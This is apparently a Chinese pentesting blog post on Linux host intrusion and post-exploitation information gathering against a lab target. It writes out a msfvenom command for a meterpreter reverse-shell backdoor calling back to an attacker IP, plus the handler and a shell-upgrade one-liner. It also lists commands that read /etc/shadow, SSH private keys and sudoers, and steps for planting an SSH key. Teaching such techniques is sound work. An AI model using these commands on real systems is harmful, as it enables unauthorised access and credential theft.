<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/1.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/1.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"onlycare.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":true,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="成殇Orz10x00 Linux主机渗透MSF生成LUNIX平台可执行文件1msfvenom -p linux&#x2F;x86&#x2F;meterpreter&#x2F;reverse_tcp lhost&#x3D;192.168.31.246 lport&#x3D;8882 -f elf -o localmsf8882.elf   生成linux后门时需注意位数为32还是64，和架构: 常见架构：  32bit ：i386,i686,x86">
<meta property="og:type" content="article">
<meta property="og:title" content="Linux主机信息收集">
<meta property="og:url" content="http://onlycare.github.io/2021/03/13/Linux%E4%B8%BB%E6%9C%BA%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/index.html">
<meta property="og:site_name" content="成殇のBlog">
<meta property="og:description" content="成殇Orz10x00 Linux主机渗透MSF生成LUNIX平台可执行文件1msfvenom -p linux&#x2F;x86&#x2F;meterpreter&#x2F;reverse_tcp lhost&#x3D;192.168.31.246 lport&#x3D;8882 -f elf -o localmsf8882.elf   生成linux后门时需注意位数为32还是64，和架构: 常见架构：  32bit ：i386,i686,x86">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://onlycare.github.io/2021/03/13/Linux%E4%B8%BB%E6%9C%BA%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/1.png">
<meta property="og:image" content="http://onlycare.github.io/2021/03/13/Linux%E4%B8%BB%E6%9C%BA%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/2.png">
<meta property="og:image" content="http://onlycare.github.io/2021/03/13/Linux%E4%B8%BB%E6%9C%BA%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/3.png">
<meta property="og:image" content="http://onlycare.github.io/2021/03/13/Linux%E4%B8%BB%E6%9C%BA%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/4.png">
<meta property="og:image" content="http://onlycare.github.io/2021/03/13/Linux%E4%B8%BB%E6%9C%BA%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/5.png">
<meta property="article:published_time" content="2021-03-13T07:08:10.000Z">
<meta property="article:modified_time" content="2021-03-14T16:37:18.666Z">
<meta property="article:author" content="成殇Orz1">
<meta property="article:tag" content="渗透测试">
<meta property="article:tag" content="信息收集">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://onlycare.github.io/2021/03/13/Linux%E4%B8%BB%E6%9C%BA%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/1.png">

<link rel="canonical" href="http://onlycare.github.io/2021/03/13/Linux%E4%B8%BB%E6%9C%BA%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Linux主机信息收集 | 成殇のBlog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --></head>

<body itemscope itemtype="http://schema.org/WebPage">

   <canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;" ></canvas> 
   <script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
   <script type="text/javascript" src="/js/fireworks.js"></script>

  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">成殇のBlog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>

  <a href="https://github.com/onlycare" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://onlycare.github.io/2021/03/13/Linux%E4%B8%BB%E6%9C%BA%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/2.png">
      <meta itemprop="name" content="成殇Orz1">
      <meta itemprop="description" content="菜鸡一枚">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="成殇のBlog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Linux主机信息收集
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-03-13 15:08:10" itemprop="dateCreated datePublished" datetime="2021-03-13T15:08:10+08:00">2021-03-13</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-03-15 00:37:18" itemprop="dateModified" datetime="2021-03-15T00:37:18+08:00">2021-03-15</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" itemprop="url" rel="index"><span itemprop="name">渗透测试</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>4.9k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>4 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="成殇Orz1"><a href="#成殇Orz1" class="headerlink" title="成殇Orz1"></a>成殇Orz1</h3><h3 id="0x00-Linux主机渗透"><a href="#0x00-Linux主机渗透" class="headerlink" title="0x00 Linux主机渗透"></a>0x00 Linux主机渗透</h3><h5 id="MSF生成LUNIX平台可执行文件"><a href="#MSF生成LUNIX平台可执行文件" class="headerlink" title="MSF生成LUNIX平台可执行文件"></a>MSF生成LUNIX平台可执行文件</h5><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> linux/x86/meterpreter/reverse_tcp lhost=<span class="number">192.168</span>.<span class="number">31.246</span> lport=<span class="number">8882</span> <span class="operator">-f</span> elf <span class="literal">-o</span> localmsf8882.elf</span><br></pre></td></tr></table></figure>

<p><img src="/2021/03/13/Linux%E4%B8%BB%E6%9C%BA%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/1.png"></p>
<p>生成linux后门时需注意位数为32还是64，和架构: 常见架构：</p>
<blockquote>
<p>32bit ：i386,i686,x86,arm </p>
<p>64bit ：x64,x86_64,amd64,arm64,aarch64</p>
</blockquote>
<span id="more"></span>

<h5 id="MSF开启handler"><a href="#MSF开启handler" class="headerlink" title="MSF开启handler"></a>MSF开启handler</h5><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">handler <span class="literal">-H</span> <span class="number">192.168</span>.<span class="number">31.246</span> <span class="literal">-P</span> <span class="number">8882</span> <span class="literal">-p</span> linux/x86/meterpreter/reverse_tcp</span><br></pre></td></tr></table></figure>

<p><img src="/2021/03/13/Linux%E4%B8%BB%E6%9C%BA%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/2.png"></p>
<h5 id="上传后门至靶机-tmp目录：所有用户、用户组都具有可写权限"><a href="#上传后门至靶机-tmp目录：所有用户、用户组都具有可写权限" class="headerlink" title="上传后门至靶机 /tmp目录：所有用户、用户组都具有可写权限"></a>上传后门至靶机 /tmp目录：所有用户、用户组都具有可写权限</h5><h5 id="靶机运行后门，获取meterpreter"><a href="#靶机运行后门，获取meterpreter" class="headerlink" title="靶机运行后门，获取meterpreter"></a>靶机运行后门，获取meterpreter</h5><p><img src="/2021/03/13/Linux%E4%B8%BB%E6%9C%BA%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/3.png"></p>
<h5 id="meterpreter获取到shell默认是-bin-sh"><a href="#meterpreter获取到shell默认是-bin-sh" class="headerlink" title="meterpreter获取到shell默认是/bin/sh"></a>meterpreter获取到shell默认是/bin/sh</h5><h5 id="可以使用-python-c-“import-pty-pty-spawn-‘-bin-bash’-”切换至-bin-bash"><a href="#可以使用-python-c-“import-pty-pty-spawn-‘-bin-bash’-”切换至-bin-bash" class="headerlink" title="可以使用 python -c “import pty;pty.spawn(‘/bin/bash’);”切换至/bin/bash"></a>可以使用 python -c “import pty;pty.spawn(‘/bin/bash’);”切换至/bin/bash</h5><p><img src="/2021/03/13/Linux%E4%B8%BB%E6%9C%BA%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/4.png"></p>
<p><img src="/2021/03/13/Linux%E4%B8%BB%E6%9C%BA%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/5.png"></p>
<h3 id="0x01-Linux主机信息收集"><a href="#0x01-Linux主机信息收集" class="headerlink" title="0x01 Linux主机信息收集"></a>0x01 Linux主机信息收集</h3><h4 id="1-系统架构"><a href="#1-系统架构" class="headerlink" title="1 - 系统架构"></a>1 - 系统架构</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">uname <span class="literal">-a</span>		// 打印系统信息</span><br><span class="line"></span><br><span class="line"><span class="built_in">cat</span> /etc/issue		///etc/issue是一个文本文件，其中包含在登录提示之前打印的消息或系统标识</span><br><span class="line"></span><br><span class="line"><span class="built_in">cat</span> /etc/*<span class="literal">-release</span>	// /etc/lsb<span class="literal">-release</span>, /etc/redhat<span class="literal">-release</span> 查看操作系统发行版本。</span><br><span class="line"></span><br><span class="line"><span class="built_in">cat</span> /proc/version	// /proc/version指定了Linux内核的版本，用于编译内核的gcc的版本以及内核</span><br><span class="line">			   编译的时间.它还包含内核编译器的用户名。</span><br><span class="line"></span><br><span class="line"><span class="built_in">cat</span> /proc/sys/kernel/version	// /proc/sys/kernel/ 中的文件可以用来调整和监视Linux内核</span><br><span class="line">			 	   操作中的各种活动</span><br></pre></td></tr></table></figure>

<h4 id="2-进程"><a href="#2-进程" class="headerlink" title="2 - 进程"></a>2 - 进程</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">ps</span> <span class="literal">-elf</span>				// 列出当前进程快照</span><br><span class="line"></span><br><span class="line"><span class="built_in">ps</span> aux				// 列出当前进程快照</span><br><span class="line"></span><br><span class="line">s <span class="literal">-al</span> /proc/			// /proc是非常特殊的，它也是一个虚拟文件系统。 它有时被称为过程</span><br><span class="line">				信息伪文件系统。它不包含“真实”文件，而是包含运行时系统信息（例</span><br><span class="line">				如系统内存，安装的设备，硬件配置等）</span><br><span class="line">							</span><br><span class="line"><span class="built_in">ls</span> <span class="literal">-al</span> /proc/<span class="number">99</span>			// 查看关于PID <span class="number">99</span>的信息		</span><br><span class="line"></span><br><span class="line">top				//top命令显示您的Linux机器的处理器活动，并显示实时管理的任务。</span><br><span class="line">				它会显示正在使用的处理器和内存以及运行进程等其他信息。按q可以退出	  </span><br></pre></td></tr></table></figure>

<h4 id="3-用户和组"><a href="#3-用户和组" class="headerlink" title="3 - 用户和组"></a>3 - 用户和组</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">id					// 找到用户的UID或GID等信息.</span><br><span class="line"></span><br><span class="line">w					// 显示登录到Linux服务器的人员.</span><br><span class="line"></span><br><span class="line">whoami					// 显示当前用户名</span><br><span class="line"></span><br><span class="line">last lastb				// 显示用户登录记录 显示用户登录失败记录</span><br><span class="line"></span><br><span class="line">lastlog					// 格式化打印上次登录日志 /var/log/lastlog 文件的内容</span><br><span class="line"></span><br><span class="line"><span class="built_in">cat</span> /etc/passwd				// 有关用户信息的基于文本的数据库，可以登录系统或其他拥</span><br><span class="line">					   有正在运行的进程的操作系统用户身份。</span><br><span class="line"></span><br><span class="line"><span class="built_in">cat</span> /etc/shadow				// /etc/shadow用于通过限制除高度特权的用户对散列密码</span><br><span class="line">				 	   数据的访问来提高密码的安全级别。</span><br><span class="line">				 	   通常情况下，该数据保存在超级用户拥有的文件中，并且只</span><br><span class="line">				 	   能由超级用户访问。</span><br><span class="line"></span><br><span class="line"><span class="built_in">cat</span> /etc/sudoers			// /etc/sudoers 文件内容是使用sudo命令必须遵守的规则</span><br><span class="line"></span><br><span class="line">sudo <span class="literal">-V</span>					// 打印sudo版本字符串</span><br><span class="line"></span><br><span class="line">sudo <span class="literal">-l</span>					// 列出目前用户可执行与无法执行的指令</span><br></pre></td></tr></table></figure>

<h4 id="4-SSH服务信息"><a href="#4-SSH服务信息" class="headerlink" title="4 - SSH服务信息"></a>4 - SSH服务信息</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> ~/.ssh/authorized_keys		// 使用公钥认证，认证实体具有公钥和私钥。私钥保存在登录</span><br><span class="line">					   的计算机上,公钥存在要登录的所有计算机上 .ssh/authorized_keys 文件中。</span><br><span class="line"><span class="built_in">cat</span> ~/.ssh/id_rsa.pub			// RSA 公钥 会保存为 .ssh/id_rsa.pub.</span><br><span class="line"><span class="built_in">cat</span> ~/.ssh/id_rsa			// RSA 私钥 会保存在你的home目录中 ：.ssh/id_rsa</span><br><span class="line"><span class="built_in">cat</span> /etc/ssh/ssh_config			// OpenSSH SSH 控制端配置文件</span><br><span class="line"><span class="built_in">cat</span> /etc/ssh/sshd_config		// OpenSSH SSH 服务端配置文件</span><br><span class="line"></span><br><span class="line">密钥登录</span><br><span class="line"></span><br><span class="line">ssh<span class="literal">-keygen</span>					// 生成密钥对，私钥保存在你登录的计算机上公</span><br><span class="line">						  钥存储在要登录的所有计算机上的.ssh/authorized_keys 文件中。</span><br><span class="line"><span class="built_in">cat</span> ~/.ssh/id_rsa.pub &gt;&gt; authorized_keys	// 安装公钥</span><br><span class="line">chmod <span class="number">600</span> ~/.ssh/authorized_keys</span><br><span class="line">chmod <span class="number">600</span> ~/.ssh/id_rsa</span><br><span class="line">chmod <span class="number">700</span> ~/.ssh				// 设置权限		</span><br><span class="line">vim /etc/ssh/sshd_config			// 编辑服务端配置文件</span><br><span class="line"></span><br><span class="line">RSAAuthentication yes</span><br><span class="line">PubkeyAuthentication yes</span><br><span class="line">PermitRootLogin yes				// [可选]禁用密码登录</span><br><span class="line">PasswordAuthentication no</span><br><span class="line"></span><br><span class="line">service sshd restart				// 重启ssh服务</span><br></pre></td></tr></table></figure>

<h4 id="5-服务状态"><a href="#5-服务状态" class="headerlink" title="5 - 服务状态"></a>5 - 服务状态</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">service -<span class="literal">-status</span><span class="literal">-all</span>				// 检查所有服务状态</span><br><span class="line">systemctl <span class="literal">-a</span>					// 列出安装在文件系统中的所有单元.</span><br><span class="line">service servicename <span class="built_in">start</span></span><br><span class="line">systemctl <span class="built_in">start</span> servicename			// 启动某个服务</span><br><span class="line">service servicename stop</span><br><span class="line">systemctl stop servicename			// 停止某个服务</span><br><span class="line">service servicename status</span><br><span class="line">systemctl status servicename			// 显示某个服务状态信息</span><br><span class="line"><span class="built_in">cat</span> /etc/services				// /etc/services将端口号映射到指定的服务</span><br></pre></td></tr></table></figure>

<h4 id="6-安全-iptables"><a href="#6-安全-iptables" class="headerlink" title="6 - 安全 - iptables"></a>6 - 安全 - iptables</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">iptables <span class="literal">-L</span>				// 列出所有规则链。</span><br><span class="line">iptables <span class="operator">-F</span>				// 删除选定规则链中的所有规则.</span><br><span class="line">iptables <span class="literal">-A</span> INPUT <span class="literal">-p</span> icmp <span class="literal">-m</span> icmp –icmp<span class="literal">-type</span> <span class="number">0</span> <span class="literal">-j</span> ACCEPT</span><br><span class="line">					// 请执行iptables <span class="literal">-p</span> icmp –help 获得更多信息.</span><br><span class="line">					</span><br><span class="line">iptables <span class="literal">-A</span> INPUT <span class="literal">-p</span> tcp <span class="literal">-m</span> tcp –sport <span class="number">80</span> <span class="literal">-m</span> state –state RELATED,ESTABLISHED <span class="literal">-j</span> ACCEPT</span><br><span class="line">            	// 允许来自src端口<span class="number">80</span>的tcp连接</span><br><span class="line">            	// <span class="literal">-A</span> 新增一条规则 , INPUT[入方向],OUTPUT[出方向]</span><br><span class="line">            	// <span class="literal">-p</span> 协议类型</span><br><span class="line">            	// <span class="literal">-sport</span> 源端口 <span class="literal">-dport</span> 目标端口</span><br><span class="line">            	// <span class="literal">-j</span> 处理数据包的动作，ACCEPT 、DROP</span><br><span class="line"></span><br><span class="line">iptables <span class="literal">-A</span> OUTPUT <span class="literal">-p</span> tcp <span class="literal">-m</span> tcp <span class="literal">-dport</span> <span class="number">80</span> <span class="literal">-m</span> state –state NEW,RELATED,ESTABLISHED <span class="literal">-j</span> ACCEPT</span><br><span class="line">				// 允许 从/到 dst 端口<span class="number">80</span>的TCP连接.</span><br><span class="line">			</span><br><span class="line">iptables <span class="literal">-A</span> INPUT <span class="literal">-p</span> udp <span class="literal">-m</span> udp –sport <span class="number">53</span> <span class="literal">-m</span> state –state RELATED,ESTABLISHED <span class="literal">-j</span> ACCEPT</span><br><span class="line">				// 允许来自src端口<span class="number">80</span>的udp连接</span><br><span class="line"></span><br><span class="line">iptables <span class="literal">-A</span> OUTPUT <span class="literal">-p</span> udp <span class="literal">-m</span> udp –dport <span class="number">53</span> <span class="literal">-m</span> state –state NEW,RELATED,ESTABLISHED <span class="literal">-j</span> ACCEPT</span><br><span class="line">				// 允许从/到 dst 端口<span class="number">53</span>的udp连接.</span><br><span class="line">                </span><br><span class="line">iptables <span class="literal">-A</span> OUTPUT <span class="literal">-p</span> tcp <span class="literal">-m</span> tcp –sport <span class="number">55552</span> <span class="literal">-s</span> <span class="number">127.0</span>.<span class="number">0.1</span> <span class="literal">-d</span> <span class="number">127.0</span>.<span class="number">0.1</span> <span class="literal">-j</span> ACCEPT</span><br><span class="line">iptables <span class="literal">-A</span> OUTPUT <span class="literal">-p</span> tcp <span class="literal">-m</span> tcp –dport <span class="number">55552</span> <span class="literal">-s</span> <span class="number">127.0</span>.<span class="number">0.1</span> <span class="literal">-d</span> <span class="number">127.0</span>.<span class="number">0.1</span> <span class="literal">-j</span> ACCEPT</span><br><span class="line">				// 允许本地主机连接到 localhost:<span class="number">55552</span></span><br><span class="line">				// <span class="literal">-s</span> 原地址ip <span class="literal">-d</span> 目标地址ip</span><br><span class="line">				// <span class="literal">-i</span> 指定数据包从哪块网卡进入<span class="literal">-o</span>指定数据包从哪块网卡输出</span><br></pre></td></tr></table></figure>

<h4 id="7-网络"><a href="#7-网络" class="headerlink" title="7 - 网络"></a>7 - 网络</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">ifconfig <span class="literal">-a</span>				// 显示当前可用的所有接口</span><br><span class="line"></span><br><span class="line">hostname				// 显示或设置系统的主机名称。</span><br><span class="line"></span><br><span class="line">netstat <span class="literal">-antp</span>				// 显示网络状态</span><br><span class="line"></span><br><span class="line">netstat <span class="literal">-anup</span>				// 显示网络状态</span><br><span class="line"></span><br><span class="line">lsof <span class="literal">-nPi</span>				// 列出打开的文件</span><br><span class="line"></span><br><span class="line">route <span class="literal">-e</span>				//显示/操作IP路由表</span><br><span class="line"></span><br><span class="line"><span class="built_in">cat</span> /etc/resolv.conf			//该文件是DNS域名解析的配置文件，它的格式很简单，每行</span><br><span class="line">					  以一个关键字开头，后接配置参数。resolv.conf的关键</span><br><span class="line">					  字主要有四个，分别是：`nameserver :定义DNS服务器的IP地址</span><br><span class="line"><span class="built_in">cat</span> /etc/hosts				// /etc/hosts是一个简单的文本文件,将IP地址与主机名相</span><br><span class="line">					  关联，每个IP地址一行。</span><br><span class="line"></span><br><span class="line"><span class="built_in">cat</span> /etc/network/interfaces		// /etc/network/interfaces 文件包含网络接口配置信息。</span><br><span class="line"></span><br><span class="line"><span class="built_in">cat</span> /etc/sysconfig/network		// /etc/sysconfig/network 文件用于指定有关服务器上所</span><br><span class="line">					  需网络配置的信息。</span><br><span class="line"></span><br><span class="line"><span class="built_in">cat</span> /etc/networks			// /etc/networks是一个简单的ASCII文件,描述这些网络已</span><br><span class="line">					  知DARPA网络符号名称</span><br></pre></td></tr></table></figure>

